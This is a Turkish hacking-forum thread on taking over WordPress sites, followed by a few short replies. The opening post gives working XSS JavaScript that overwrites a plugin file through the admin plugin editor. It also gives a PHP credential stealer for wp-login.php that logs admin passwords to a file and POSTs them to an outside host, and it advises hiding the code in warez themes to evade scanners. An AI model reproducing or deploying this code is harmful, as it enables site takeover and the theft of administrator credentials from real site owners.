Wordpress Xss İle Shell Sokma
-
x=new XMLHttpRequest()
p='/wp-admin/plugin-editor.php?'
f='file=hello.php'
x.open('GET',p+f,0)
x.send()
$='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?php echo("Babagundi"); ?>&action=update&'+f
x.open('POST',p+f,1)
x.setRequestHeader('Content-Type','application/x-www-form-urlencoded')
x.send($)yukarıdaki javascript kodunu xss olan açıktan admin abimize tıklattımız anda wordpress hello.php plugin dosyamıza shell kodunu açtırmış oluruz şimdi diyiceksiniz admin tıklıycakta falanda filanda der gibi oluyorsunuzdur warez temaların içine kodu eklediğiniz anda hiç bir script scannera takılmadan istedeğiniz dosyaya istediğiniz komutu yollarsınız Aşşadığdaki verdim kodu wp-login.php dosyasına eklersiniz admin login passını license.txt dosyasına eklemiş olursunuz.
if($_POST){
$userr = $_POST['log'];
$pww = $_POST['pwd'];
$subject = "SİTE:".$_SERVER["HTTP_HOST"]."";
$site = $_SERVER["HTTP_HOST"];
$dosya_adi = "licence.txt";
touch ("licence.txt") or die ("Dosya Yaratılamadı!") ;
$dosya = fopen ('licence.txt' , 'a') or die ("Dosya açılamadı!");
file_put_contents ($dosya_adi , ' Username:'.$userr.'
PW:'.$pww.'',FILE_APPEND);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://kekobabakeko.com/geldikeko.php");
curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_AUTOREFERER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
'user' => $userr,
'pw' => $pww,
'site' => $site,
));
$result = curl_exec($ch);
curl_close($ch);
$icerik = 'Usename: ' .$userr. '
PW: ' .$pww. '
Site:'. $_SERVER["HTTP_HOST"];
} -
Herne kadar bu taraklarda bezim olmasa da, forumda türünün tek örneğisin vesselam hocam :)
-
Sağollasın kendini bu yolda geliştirmek isteyenler kullanır ben fikir atıyorum ortaya :D
-
geçen wp sitelerimden birine girdim kullanıcılara bakayım dedim 4 tane yönetici kullanıcı vardı yönetici olarak atanmış sonra kullanıcı kaydına baktım kullanıcı kaydı abone olerak seçili
siteye iç birşey olmamış kod felan sokulmamış neyse sldim zaten otomatik update ediyo wp güncel yani anlamadım :D
-
DJ_Alper bunu yazdı
geçen wp sitelerimden birine girdim kullanıcılara bakayım dedim 4 tane yönetici kullanıcı vardı yönetici olarak atanmış sonra kullanıcı kaydına baktım kullanıcı kaydı abone olerak seçili
siteye iç birşey olmamış kod felan sokulmamış neyse sldim zaten otomatik update ediyo wp güncel yani anlamadım :D
temanda xss vardır yada biri admin şifreni araklamıştır